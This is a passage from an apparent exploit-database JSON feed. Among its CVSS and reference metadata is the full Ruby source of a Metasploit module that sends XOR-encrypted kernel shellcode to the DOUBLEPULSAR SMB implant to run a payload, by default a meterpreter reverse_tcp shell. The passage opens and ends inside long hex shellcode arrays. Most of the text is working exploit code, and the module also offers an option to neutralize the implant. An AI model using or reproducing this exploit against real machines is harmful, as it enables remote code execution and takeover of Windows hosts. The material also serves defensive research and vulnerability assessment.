\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-09] #"}, "lastseen": "2021-09-08T22:11:45", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "0b4714ff5686e3ccd0040d2199e5c9e4", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T22:15:20", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27802"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-09T22:15:20", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-09T22:15:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n 